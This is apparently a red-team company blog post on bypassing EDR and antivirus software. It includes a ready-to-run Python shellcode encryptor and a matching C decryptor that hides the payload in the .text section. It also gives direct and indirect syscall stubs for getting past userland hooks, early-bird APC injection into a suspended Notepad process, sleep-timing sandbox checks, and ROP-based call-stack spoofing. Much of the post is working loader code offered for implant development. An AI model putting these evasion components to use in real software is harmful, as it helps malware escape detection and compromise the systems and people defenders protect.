With the threat landscape evolving quickly, security software vendors have had to adapt in a number of ways. Antivirus solutions have failed to keep pace with new technologies and haven’t provided adequate protection against sophisticated attackers. These advances have ushered in a new class of security solution known as Endpoint Detection and Response (EDR) software. While each EDR solution has its own “secret sauce” when it comes to how it executes its defensive mechanisms, most operate through comparable methods. For example, many EDR solutions implement techniques including Userland Hooking, Memory Scanning, Static Detection, and Heuristic Detection. Because these techniques work in a similar manner from product to product, bypasses tend to be software-agnostic and effective against a number of products.
This blog post covers some of the EDR evasion techniques I’ve found most useful while developing software for my current position as a Maveris Red Team Operator. It assumes the reader has some knowledge of coding in both high- and low-level languages, and awareness of basic evasion components such as Position Independent Code (PIC). References to a “Dropper” or “Implant” refer to the software responsible for establishing C2 sessions or beacons.
Encryption and IOCs
We’ll begin by looking at how to make use of our PIC while evading static detection.
First, let’s look at the anatomy of our droppers. A typical vanilla dropper makes API calls to perform the following actions:
- The implant allocates writable memory for the Shellcode.
- The implant writes the Shellcode to the reserved memory.
- The implant changes the protections on the memory region to options that look more benign (i.e. RX instead of RWX).
- The implant executes the Shellcode.
There are many different API calls that can be used to carry this out, with some of the most basic being VirtualAlloc, WriteProcessMemory, VirtualProtect and CreateThread. These API calls can perform the actions above with the generated PIC, but embedding the raw PIC in the implant as-is will likely fall victim to antivirus static detection. So how can we successfully utilize the PIC we generated within the implant?
By encrypting or obfuscating it, we can bypass static detection. There are countless ways to perform this encryption, and the more creative you get, the better. Typical methods include:
- Caesar Ciphers
- XOR Key Encryption
- AES Encryption
These are all great options if you use them in an unconventional way. For example, alternating between a Caesar shift and an XOR key from byte to byte extends these common methods in a way that can help circumvent static detection. The Python script below does this: it takes raw PIC in .bin format and writes a .c file containing the encrypted bytes, ready to use in your implant.
```python
import sys


def alternate_encrypt(data, caesar_shifts, xor_keys):
    result = bytearray(data)
    for i in range(len(data)):
        if i % 2 == 0:
            # Even indices: Caesar cipher
            shift = caesar_shifts[i % len(caesar_shifts)]
            result[i] = (data[i] + shift) % 256
        else:
            # Odd indices: XOR
            key = xor_keys[i % len(xor_keys)]
            result[i] = data[i] ^ key
    return result


def format_for_c_string(data, var_name, bytes_per_line=16):
    output = f"unsigned char {var_name}[] = \""
    for i in range(len(data)):
        if i > 0 and i % bytes_per_line == 0:
            output += "\"\n \""
        output += f"\\x{data[i]:02x}"
    output += "\";"
    return output


def main():
    if len(sys.argv) != 3:
        print("Usage: python encrypt_bin.py <input.bin> <output.c>")
        sys.exit(1)

    input_file = sys.argv[1]
    output_file = sys.argv[2]

    # Read input .bin file
    try:
        with open(input_file, "rb") as f:
            data = bytearray(f.read())
    except FileNotFoundError:
        print(f"Error: Input file '{input_file}' not found.")
        sys.exit(1)

    # Define encryption parameters
    caesar_shifts = [3, 7, 11]  # Alternating shifts for Caesar cipher
    xor_keys = [0x5A, 0x3C, 0x7F]  # XOR keys for multiple byte XOR

    # Apply encryption
    encrypted = alternate_encrypt(data, caesar_shifts, xor_keys)

    # Format as C string
    c_string = format_for_c_string(encrypted, "encrypted_data")

    # Write to output .c file
    try:
        with open(output_file, "w") as f:
            f.write(c_string)
        print(f"Encrypted data written to '{output_file}'")
        print(f"Encrypted data length: {len(encrypted)} bytes")
    except Exception as e:
        print(f"Error writing output file: {e}")
        sys.exit(1)


if __name__ == "__main__":
    main()
```
AES encryption may also seem like a great option, but the crypto libraries that implement it may be an indicator of compromise (IOC) when loaded by your implant. To avoid this, a custom crypto implementation can be compiled into the implant so that no crypto library needs to be loaded. A great custom AES implementation, along with instructions for adding it to your project, can be found here: https://github.com/kokke/tiny-AES-c
Next, we need a decryption routine that restores the Shellcode to its original contents so that it executes properly when it reaches the CPU. Here is how that routine might look for the alternating encryption scheme above.
```c
#include <stddef.h>

void alternate_decrypt(unsigned char *data, size_t len,
                       const int *caesar_shifts, size_t shifts_len,
                       const unsigned char *xor_keys, size_t keys_len) {
    for (size_t i = 0; i < len; i++) {
        if (i % 2 == 0) {
            // Even indices: undo the Caesar shift
            int shift = caesar_shifts[i % shifts_len];
            data[i] = (data[i] - shift + 256) % 256;
        } else {
            // Odd indices: XOR is its own inverse
            unsigned char key = xor_keys[i % keys_len];
            data[i] ^= key;
        }
    }
}

unsigned char encrypted_data[] __attribute__((section(".text"))) = "\xff\x74\...f";
const int caesar_shifts[] = {3, 7, 11};
const size_t shifts_len = 3;
const unsigned char xor_keys[] = {0x5A, 0x3C, 0x7F};
const size_t keys_len = 3;
size_t data_len = sizeof(encrypted_data) - 1;  // exclude the string literal's trailing NUL

// Called at runtime from inside a function, once the region has been made writable:
alternate_decrypt(encrypted_data, data_len, caesar_shifts, shifts_len, xor_keys, keys_len);
```
To use this routine, replace the placeholder \xff\x74… with the encrypted Shellcode generated by the Python script.
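Because the encryption is done in Python and the decryption in C, the two routines can easily drift apart. As a minimal sketch, assuming the same shift and key lists used above, the pair can be checked offline by mirroring the C routine in Python and round-tripping some arbitrary test bytes (not a real payload):

```python
def alternate_encrypt(data, caesar_shifts, xor_keys):
    """Same transform as the encrypt_bin.py script: Caesar shift on even indices, XOR on odd."""
    result = bytearray(data)
    for i in range(len(data)):
        if i % 2 == 0:
            result[i] = (data[i] + caesar_shifts[i % len(caesar_shifts)]) % 256
        else:
            result[i] = data[i] ^ xor_keys[i % len(xor_keys)]
    return result


def alternate_decrypt(data, caesar_shifts, xor_keys):
    """Python mirror of the C alternate_decrypt routine: undo the shift, re-apply the XOR."""
    result = bytearray(data)
    for i in range(len(data)):
        if i % 2 == 0:
            # Python's % always returns a non-negative result, so no +256 is needed
            result[i] = (data[i] - caesar_shifts[i % len(caesar_shifts)]) % 256
        else:
            result[i] = data[i] ^ xor_keys[i % len(xor_keys)]
    return result


if __name__ == "__main__":
    caesar_shifts = [3, 7, 11]
    xor_keys = [0x5A, 0x3C, 0x7F]
    sample = bytes(range(256))  # arbitrary test bytes covering every byte value
    encrypted = alternate_encrypt(sample, caesar_shifts, xor_keys)
    assert bytes(alternate_decrypt(encrypted, caesar_shifts, xor_keys)) == sample
    print("round trip OK")
```

Both sides index the shift and key lists with the same `i`, so as long as the lists match, decryption exactly inverts encryption, including bytes that wrap past 0xFF.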
Payload Location — Unbacked Executable Memory
If you’re familiar with vanilla droppers, you may be wondering what `__attribute__((section(".text")))` is doing in the code. If you’re well acquainted with the PE (Portable Executable) format, you will recognize the .text section: it is the section of an executable that contains its executable instructions. This may seem counterintuitive, since “text” in most contexts refers to something completely different, but a little digging into the structure of a PE file will confirm it. In this example, we’ve placed our Shellcode in the .text section of our implant so that the executable Shellcode looks more organic to memory scanners. When you use VirtualAlloc or VirtualAllocEx to allocate memory for the Shellcode, the region is marked as private memory, and once it is made executable, it becomes a major IOC because it isn’t backed by a module on disk. Below are examples of Moneta and Process Hacker showing these detections.
While some memory scanners can detect that we’ve modified the .text section as the Shellcode decrypts, many EDR solutions may find this less conspicuous than private, unbacked executable memory. This technique also avoids allocating new memory; instead, it uses the VirtualProtect API to temporarily make a portion of the .text section writable so that the payload can be decrypted in place, and then restores the region’s executable protection.
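To see why the .text section has to be made writable before the payload can be decrypted in place, it helps to look at the section characteristics a compiler typically assigns. The sketch below is a minimal helper (`list_sections` and `decode_characteristics` are hypothetical names, not from any library) that parses the section table of a PE file using the field offsets and flag values from the Microsoft PE/COFF specification. It does only basic validation and assumes a well-formed file. A typical .text section reports CNT_CODE, MEM_EXECUTE and MEM_READ, but not MEM_WRITE.

```python
import struct

# Section characteristic flags from the Microsoft PE/COFF specification.
SECTION_FLAGS = {
    0x00000020: "CNT_CODE",
    0x00000040: "CNT_INITIALIZED_DATA",
    0x00000080: "CNT_UNINITIALIZED_DATA",
    0x02000000: "MEM_DISCARDABLE",
    0x10000000: "MEM_SHARED",
    0x20000000: "MEM_EXECUTE",
    0x40000000: "MEM_READ",
    0x80000000: "MEM_WRITE",
}


def decode_characteristics(value):
    """Return the names of the known flags set in a section's Characteristics field."""
    return [name for bit, name in SECTION_FLAGS.items() if value & bit]


def list_sections(pe):
    """Parse the section table of a PE image held in a bytes object."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]  # offset of the PE signature
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    file_header = e_lfanew + 4
    # IMAGE_FILE_HEADER: NumberOfSections at +2, SizeOfOptionalHeader at +16
    num_sections = struct.unpack_from("<H", pe, file_header + 2)[0]
    opt_size = struct.unpack_from("<H", pe, file_header + 16)[0]
    table = file_header + 20 + opt_size  # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + 40 * i  # each IMAGE_SECTION_HEADER is 40 bytes
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        virtual_size, virtual_address = struct.unpack_from("<II", pe, off + 8)
        characteristics = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append((name, virtual_address, virtual_size,
                         decode_characteristics(characteristics)))
    return sections
```

For example, `list_sections(open("implant.exe", "rb").read())` (file name hypothetical) returns one (name, virtual address, virtual size, flags) tuple per section, which makes it easy to confirm which section the encrypted bytes ended up in and what protections it carries on disk.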
Userland Hooks
As previously mentioned, the implant makes API calls to perform its operations. These Windows APIs call corresponding lower-level, largely undocumented Native APIs (NTAPIs) within NTDLL.dll. To detect malicious use of these APIs, many EDR solutions hook the NTAPIs in NTDLL.dll, because it is the last stop API calls make before transitioning into the kernel. These hooks are simply assembly instructions, like JMPs, that redirect execution of the NTAPI to EDR code that inspects how it is being used. This allows the EDR software to identify malicious usage of these APIs and mitigate risk through defensive action.
Since these hooks are all in userland, where we have read/write access to the memory, there are a number of ways we can get around them.
- We could read a fresh copy of NTDLL from disk and use it to overwrite the hooked copy in memory.
- We could unhook individual APIs by restoring their original bytes.
- If we don’t want to interact with the filesystem, we can start a suspended process, whose NTDLL typically hasn’t been hooked yet, and copy its clean NTDLL over our hooked copy. This technique is known as “Perun’s Fart” and is detailed in a number of repositories like this one: https://github.com/plackyhacker/Peruns-Fart.
- We can use direct or indirect syscalls. With direct syscalls, we call functions backed by an assembly stub that loads the syscall number into the EAX register and then executes the SYSCALL instruction itself. This transitions directly into the kernel, rather than relying on the NTAPI in NTDLL.dll to execute its SYSCALL instruction. Below is an example of what the assembly stub would look like.
```asm
mov r10, rcx
mov eax, [wSystemCall]
syscall
ret
```
- Indirect syscalls are similar, but rather than executing SYSCALL in our own stub, we jump to the SYSCALL instruction inside the NTDLL.dll stub of the NTAPI we are calling. As shown below, we can do this with a similar assembly stub.
```asm
EXTERN JMPADDR
...
mov r10, rcx
mov eax, [wSystemCall]
jmp [JMPADDR]
ret
```
This looks more normal to the EDR, because the SYSCALL instruction executes from within NTDLL.dll, an expected location. There is an excellent project called SysWhispers that greatly simplifies this process: https://github.com/klezVirus/SysWhispers3
This brings us to the next problem: syscall numbers change from one Windows version to another. EDRs can also make it harder to identify which syscall number corresponds to which NTAPI, since their hooks overwrite the stub code that loads it. However, not all functions in NTDLL are hooked, and the syscall stubs are laid out in memory in the same order as their syscall numbers, so we can derive a hooked function’s syscall number from its neighboring stubs. This technique can be seen in the Halo’s Gate project, which you can learn more about here: https://blog.sektor7.net/#!res/2021/halosgate.md. In Halo’s Gate, the target function’s stub is searched for its syscall number. If the function is hooked and no syscall number is found, it checks neighboring stubs until it finds an unhooked one, then calculates the target’s syscall number from that neighbor’s number and its distance from the target.
Once these syscall numbers are resolved, they can be loaded into the appropriate register before executing the SYSCALL instruction, either from your own assembly stub (direct syscall) or from the SYSCALL instruction in the normal execution path (indirect syscall). Locating that SYSCALL instruction can be as simple as the code below, which finds NtCreateThreadEx in NTDLL.dll and adds an offset to it. The result is the address of the stub’s SYSCALL instruction; note that the 0x12 offset assumes the x64 stub layout used by recent Windows versions and an unhooked stub.
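```c
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
UINT_PTR pointerNtCreateThreadEx = (UINT_PTR)GetProcAddress(hNtdll, "NtCreateThreadEx");
// Offset of the SYSCALL instruction within the stub (layout-dependent)
UINT_PTR syscallAddressNtCreateThreadEx = pointerNtCreateThreadEx + 0x12;
JMPADDR = syscallAddressNtCreateThreadEx;
```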
Once this address is calculated, a simple jump to it after loading up the registers can perform the indirect syscall with the previously mentioned assembly stub.
SysWhispers also resolves syscall numbers dynamically, so using it alongside Halo’s Gate would be redundant.
Process Injection
Another technique that may prove useful is process injection. While kernel telemetry will identify that a remote thread has been started by another process, injection could help our implant evade detections, as the host process may make C2 traffic and heuristics look more legitimate. Below is example code that spawns a suspended Notepad process for our Shellcode injection. The keen eye may notice that DLLs not signed by Microsoft have been blocked from loading into the process. This can prevent EDR DLLs that aren’t Microsoft-signed from being loaded into the process, which may circumvent some detections.
```cpp
PROCESS_INFORMATION pi = {};
STARTUPINFOEXA si = {};
si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
SIZE_T attributeSize = 0;

// First call only reports the buffer size needed for one attribute
InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize);
PPROC_THREAD_ATTRIBUTE_LIST attributes = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, attributeSize);
// Second call initializes the allocated list
InitializeProcThreadAttributeList(attributes, 1, 0, &attributeSize);

// Only allow Microsoft-signed DLLs to load (value 0x100000000000)
DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
UpdateProcThreadAttribute(attributes, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(DWORD64), NULL, NULL);
si.lpAttributeList = attributes;

CreateProcessA("C:\\windows\\system32\\notepad.exe", NULL, NULL, NULL, FALSE,
               EXTENDED_STARTUPINFO_PRESENT | CREATE_SUSPENDED | CREATE_NO_WINDOW,
               NULL, "C:\\Windows\\System32\\", &si.StartupInfo, &pi);
```
We’ve chosen Notepad in this example, although other host processes may better suit a C2 implant. For example, if your implant communicates over HTTPS, it may make more sense to inject into a browser process so that network monitors don’t flag the traffic as anomalous. It is also important to keep the architecture of the process in mind: injecting x64 Shellcode into an x86 process will likely cause it to crash. Below is example code that uses SysWhispers3 to call the APIs.
```cpp
// Release the attribute list once the process has been created
DeleteProcThreadAttributeList(attributes);
HeapFree(GetProcessHeap(), 0, attributes);
allocation_start = VirtualAllocExNuma(pi.hProcess, NULL, allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, 0);
status = Sw3NtWriteVirtualMemory(pi.hProcess, allocation_start, (PVOID)shellcode, allocation_size, nullptr);
DWORD oldProtect;
status = Sw3NtProtectVirtualMemory(pi.hProcess, &allocation_start, &allocation_size, PAGE_EXECUTE_READ, &oldProtect);
// Queue the Shellcode as an APC on the suspended main thread, then resume it
Sw3NtQueueApcThread(pi.hThread, (PKNORMAL_ROUTINE)allocation_start, NULL, NULL, NULL);
Sw3NtResumeThread(pi.hThread, 0);
```
Non-Emulated API
You may have noticed that the code above uses VirtualAllocExNuma rather than SysWhispers or the common VirtualAllocEx API. This is because VirtualAllocExNuma is a non-emulated API (one that many AV emulators don’t implement), so calling it may cause emulated execution to fail before our implant does its thing. That failure can help evade detection, since many detection solutions emulate a binary’s execution and examine its behavior to determine whether it is doing anything malicious. More details can be found here: https://redfoxsecurity.medium.com/antivirus-evasion-26a30f072f76
Sleep Timers
In addition to non-emulated APIs, you may see malware use sleep timers with a conditional exit based on whether a certain period of time has actually elapsed. This is because emulators typically fast-forward through sleep calls so that the defensive mechanism doesn’t degrade the user experience. We can therefore use these timers as a litmus test for whether execution is being emulated for detection purposes, and if it is, exit before any malicious action is detected. This can be done in any programming language. Here is a C# example:
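```csharp
DateTime t1 = DateTime.Now;
Sleep(2000);
double t2 = DateTime.Now.Subtract(t1).TotalSeconds;
// If less than 1.5 s actually elapsed, the sleep was likely fast-forwarded by an emulator
if (t2 < 1.5)
{
    return;
}
```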
More details about different ways to delay execution and their detections can be found here: https://www.malwation.com/blog/simplest-yet-most-common-and-effective-evasion-tactic-sleep
NtQueueApcThread
Using NtQueueApcThread may be a better option than the CreateRemoteThread API. Both are now monitored by most EDR solutions, but CreateRemoteThread is the more obvious of the two. In the SysWhispers example code above, we spawned our Notepad process suspended, queued an APC pointing at our Shellcode on its main thread, and then resumed that thread. This should result in our Shellcode being executed and a beacon running in the context of the host process. More details can be found here: https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection
Call Stack Spoofing
EDRs inspect call stacks to determine whether they look legitimate, and if they don’t, they take defensive action. Executing our implant can make the call stack look abnormal. For example, when our vanilla implant attempts to create a thread, the call stack contains addresses in executable memory that is not backed by a module on disk. This is a major IOC and would likely be detected by EDR software. As you can see below, these memory addresses don’t align with normal execution.
It is worth noting that the entire stack lives in userland, so we can modify it to look legitimate. To make our call stack look more organic, we can examine what a normal call stack looks like in a Notepad process.
Inspecting Notepad in our debugger, we see the following call stack values:
These look like values we can mimic to make our call stack look legitimate. To do this, we begin by mining function prologues and epilogues for stack frame size information.
Having found the stack frame size, we know where the return address resides on the stack. Overwriting this value allows us to manually spoof our call stack. Below, you will see that we have copied the previous entry’s address to an offset of 0x80, the frame size we mined from the function prologue. This results in duplicate entries in the call stack.
We can use this technique to write innocuous-looking values to return address locations, all in an effort to hide malicious code execution. Below, we see that we have spoofed our call stack so that it looks like a normal call stack when executing our modified implant/dropper.
ROP Gadget
We’ve used a ROP gadget to bounce our execution off of a legitimate module, making our call stack look even more legitimate, and we’ve also taken advantage of the fact that a return address of 0 ends the stack walk, allowing us to omit entries from the call stack.
To illustrate how part of this method works under the hood, let’s walk through how it could be implemented.
First, we locate a ROP gadget in a legitimate module. In our example, we found a call r12 gadget in NTDLL.dll.
Next, we load the address of the function we intend to call with a spoofed stack into a register. In this example, we pass this address as a parameter to our function, so it arrives in the rcx register.
mov r10, rcx
Then we load the address of the stack-and-register-restoring function that our ROP gadget will call into a register.
lea r12, Restore
Now we write the address of the call r12 ROP gadget to the stack as the return address. In our example, we again pass this address as a parameter to our function, so it arrives in the r8 register.
mov [rsp], r8
Next, after adding code to handle the target function’s parameters, we jump to its address:
jmp r10
When the spoofed function returns, it takes our ROP gadget’s address off the stack as its return address. The gadget then calls our Restore function, which restores the registers and stack frame so that execution continues properly, with a patched call stack.
```asm
Restore:
    ; restore registers and stack frame
    ret
```
This will cause an entry in the call stack to be that of our ROP gadget. Since this ROP gadget is located in a legitimate module, it will look organic in the call stack.
It is also necessary to patch the stack, as previously shown, to hide our nefarious intent. To locate the return addresses on the stack, we can parse the RUNTIME_FUNCTION entries in the .pdata section and the UNWIND_CODEs they reference, which describe each function’s stack frame. Once this is done, we can manipulate the call stack to look benign and execute code to our liking. A great implementation of this can be found in this project: https://github.com/WithSecureLabs/CallStackSpoofer
Another good implementation using another gadget to stack spoof can be found here: https://github.com/susMdT/LoudSunRun
Summary
AV/EDR evasion is a cat-and-mouse game, and both security researchers and threat actors constantly come up with innovative new ways to evade defenses. There are seemingly countless variations on certain evasion techniques, and developing detection mechanisms without impacting legitimate use of regular programs has become increasingly difficult. To wrap things up, those are some of my favorite techniques for EDR evasion, and I hope you enjoyed this article. :)
Maveris is an IT and cybersecurity company committed to helping organizations create secure digital solutions to accelerate their mission. We are Veteran-owned and proud to serve customers across the Federal Government and private sector. Maveris Labs is a space for employees and customers to ask and explore answers to their burning “what if…” questions and to expand the limits of what is possible in IT and cybersecurity. To learn more, go to maveris.com